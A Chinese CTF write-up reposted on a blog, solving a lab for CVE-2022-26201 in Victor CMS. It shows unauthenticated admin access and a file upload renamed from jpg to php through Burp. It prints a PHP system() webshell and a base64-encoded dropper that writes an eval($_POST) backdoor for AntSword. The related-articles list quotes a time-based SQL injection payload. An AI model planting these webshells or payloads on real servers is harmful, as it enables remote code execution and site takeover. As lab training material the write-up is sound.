春秋云境:CVE-2022-26201(二次注入漏洞)

这篇具有很好参考价值的文章主要介绍了春秋云境:CVE-2022-26201(二次注入漏洞)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、题目

二、上传权限马

三、蚁剑马连接


一、题目

春秋云境:CVE-2022-26201(二次注入漏洞)

进入题目:

春秋云境:CVE-2022-26201(二次注入漏洞)

 这个是和春秋云境:CVE-2022-28060一个网站,看来应该是存在多个漏洞。

点击admin 不用登录

春秋云境:CVE-2022-26201(二次注入漏洞)

 Users ---- add users

春秋云境:CVE-2022-26201(二次注入漏洞)

选择文件 这里要是jpg图片格式 如果是php格式是无法运行一句话木马的

春秋云境:CVE-2022-26201(二次注入漏洞)

二、上传权限马

普通的一句话木马上传 在这个靶场是访问不了flag的:

春秋云境:CVE-2022-26201(二次注入漏洞)

只显示除了一句话木马的代码 

春秋云境:CVE-2022-26201(二次注入漏洞)

 构造system权限马:

<?php system($_GET[1]);phpinfo();?>

春秋云境:CVE-2022-26201(二次注入漏洞)

 抓包

春秋云境:CVE-2022-26201(二次注入漏洞)

 发包

春秋云境:CVE-2022-26201(二次注入漏洞)

 改包jpg改为php

春秋云境:CVE-2022-26201(二次注入漏洞)

查看 http://xxx.ichunqiu.com/img/xxx.php?1=cat%20/flag

春秋云境:CVE-2022-26201(二次注入漏洞)

 flag{f1cc8a36-a3cf-40b6-8a89-84bd365354ee}

三、蚁剑马连接

一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:

base64先对一句话木马加密<?php @eval($_POST['wjsc']);?>

春秋云境:CVE-2022-26201(二次注入漏洞)

 木马如下:

<?php
 
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3anNjJ10pOz8+'));
							
?>

 burp抓包--重放器--jpg改为php:

春秋云境:CVE-2022-26201(二次注入漏洞)

 生成shell.php文件,木马是以base64的形式。

 连接蚁剑:

春秋云境:CVE-2022-26201(二次注入漏洞)

 根目录下查看flag:

春秋云境:CVE-2022-26201(二次注入漏洞)

 flag{70d851f7-4cbc-4604-86f7-555f2031f81f}   靶场时间过了 所以flag不一样 每次开会更新。文章来源地址https://www.toymoban.com/news/detail-420738.html

到了这里,关于春秋云境:CVE-2022-26201(二次注入漏洞)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 春秋云境:CVE-2022-29464(WSO2文件上传漏洞)

    一、题目 二、burp改包   进入题目: 是一个登录页面   这题确实没什么思路,所以看了官方POC: 因为这个漏洞已经被国家cnnvd收入了 burp抓包:不需要登录,刷新即可。  发送到重放器:根据官方POC更改即可: 这两个参数需要用本机抓包的:  如图: 在次访问登录网站,

    2024年02月08日
    浏览(42)
  • 春秋云境:CVE-2022-28060

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Victor CMS v1.0 /includes/login.php 存在sql注入 解题步骤 访问URL,在登录过程中抓包: 探测存在SQL注入: 1\\\'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+\\\'1\\\'=\\\' 使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取: 文章合集 :春秋云境

    2024年02月12日
    浏览(61)
  • 春秋云境:CVE-2022-24124

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 解题步骤 题外话 这个题

    2024年02月01日
    浏览(37)
  • 春秋云境:CVE-2022-28525

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 ED01-CMS v20180505 存在任意文件上传漏洞 解题步骤 访问URL 通过弱口令进行登录:admin/admin 登录后在图中位置点击进行图片更新,需要将密码等都写上 抓包将图片信息进行替换,并修改文件名 上传成功后访问上传的shell并执

    2024年02月11日
    浏览(56)
  • 春秋云境:CVE-2022-26965

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Pluck-CMS-Pluck-4.7.16 后台RCE 解题步骤 过弱口令登录:admin 登录之后按照图中位置进行主题安装 按照这位大哥文章: https://blog.csdn.net/weixin_39639260/article/details/116105945 中说的,需要将主题中的info.php文件修改,再打包成zip再上

    2024年02月04日
    浏览(51)
  • 【春秋云境】CVE-2022-30887

    标靶介绍: 多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任

    2024年02月16日
    浏览(37)
  • 春秋云境:CVE-2022-24112

    文章合集 :春秋云境系列靶场记录(合集) 漏洞介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于

    2024年02月06日
    浏览(40)
  • 【春秋云境】CVE-2022-32991

    靶标介绍: ​ 该CMS的welcome.php中存在SQL注入攻击 介绍中就很明显提示了welcome.php中存在SQL注入,那么就直接访问。但是要先登录,我们直接注册一个进去。 注册完登录进去就发现有问题: 根据CVE官方: ​ 在 welcome.php ,发现基于 Web 的测验系统 v1.0 通过 eid 参数 包含一个

    2024年02月12日
    浏览(35)
  • Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

    spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)

    2024年02月08日
    浏览(38)
  • Taocms 代码注入漏洞(CVE-2022-25578)

    0x01 漏洞介绍 Taocms是中国的一个微型 Cms(内容管理系统)。 Taocms v3.0.2 存在安全漏洞,该漏洞允许攻击者通过任意编辑.htaccess 文件来执行代码注入。 TAOCMS v3.0.2允许攻击者通过任意编辑.htaccess文件来执行代码注入。 0x02 影响版本 Taocms v3.0.2 0x03 漏洞编号 CNNVD编号:CNNVD-202203

    2024年02月03日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包